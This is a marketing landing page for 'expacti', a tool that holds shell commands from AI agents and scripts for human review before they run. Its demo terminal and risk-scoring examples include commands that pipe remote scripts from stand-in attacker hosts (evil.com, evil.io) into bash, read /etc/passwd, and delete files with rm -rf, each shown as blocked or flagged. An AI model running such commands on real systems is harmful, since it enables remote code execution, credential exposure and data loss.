v0.1 · Early Access

Every command,
approved.

Your agents and scripts run shell commands constantly. expacti makes every one of them ask permission first.

Get early access ▶ Interactive demo
expacti-sh — production-server
$ curl https://evil.com/payload.sh | bash
⬡ expacti intercepted — RCE pattern detected
curl https://evil.com/payload.sh | bash
risk score: 97 · session: prod-agent-01 · pipe to shell · blocked
✗ DENIED — remote code execution pattern
$ docker ps --format "table {{.Names}}\t{{.Status}}"
✓ auto-approved · whitelisted command · risk 4
NAMES STATUS
api-prod Up 14 days
postgres-01 Up 14 days
$
Built for teams who take security seriously
🔒
Zero commands pass without approval
📋
Full audit trail — every decision logged
<100ms overhead — barely noticeable
🛡️
SOC2-ready audit reports
// how it works

Zero trust for
shell commands.

Drop-in replacement for your shell. Every command passes through a human checkpoint before execution.

01 —

Intercept

expacti-sh wraps your shell. Commands are captured before the OS sees them.

02 —

Analyze

Risk scoring, anomaly detection, and whitelist matching — in milliseconds.

03 —

Review

High-risk commands surface to your reviewer dashboard. One click to allow or deny.

04 —

Execute

Approved commands run. Denied ones are logged. Full audit trail, always.

// risk scoring

Not all commands
are equal.

Built-in risk scoring surfaces what matters. Whitelist the routine. Scrutinize the dangerous.

$ ls -la /var/log/
read-only · auto-approvedrisk 8
$ cat /etc/passwd
credential access · queuedrisk 52
$ curl -s http://evil.io | bash
RCE pattern · blockedrisk 95
$ rm -rf /var/cache/*
destructive · review requiredrisk 78
// capabilities

Built for
production teams.

Everything you need to put a human in the loop — without slowing your team down.

WebSocket approval flow

Sub-second latency between interception and reviewer notification. No polling.

Whitelist engine

Exact, glob, and regex rules. Safe commands auto-approve. Risky ones surface immediately.

Multi-party approval

Require any, all, or a quorum of reviewers for critical operations.

Anomaly detection

8 built-in rules flag behavioral deviations — new commands, odd timing, credential patterns.

Full audit trail

Tamper-evident hash chain. Export to JSON or CSV. Compliance-ready from day one.

OIDC & RBAC

Google, GitHub, Microsoft login. Role-based reviewer permissions. API keys for automation.

// comparison

How expacti
compares.

Traditional tools secure access. expacti secures every command.

Bastion hosts Teleport expacti
Per-command approval
Real-time review UI
AI whitelist suggestions
Open source friendly Partial
Price Free $$$ Free / Pro
// pricing

Simple, transparent
pricing.

Start free. Upgrade when you need more.

Free
$0
For individuals and small experiments.
  • 1 target server
  • 1 reviewer
  • 30 days history
  • 100 commands/month
  • Community support
Get started free
Most popular
Pro
$29/month
For teams running production workloads.
  • 10 target servers
  • 5 reviewers
  • 1 year history
  • Unlimited commands
  • Email support
  • Session recording
  • AI whitelist suggestions
Start Pro trial
Enterprise
Custom
For organizations with compliance needs.
  • Unlimited targets & reviewers
  • Self-hosted option
  • SSO / SAML
  • Compliance reports (SOC2, ISO27001)
  • SLA + dedicated support
  • TOTP 2FA
Contact us
// get started

Your agents are running.
Are you watching?

Early access is open. No credit card. Deploy in minutes.

Create free account Open control panel
// beta waitlist

Join the waitlist

Get early access to expacti. We'll notify you when your spot is ready.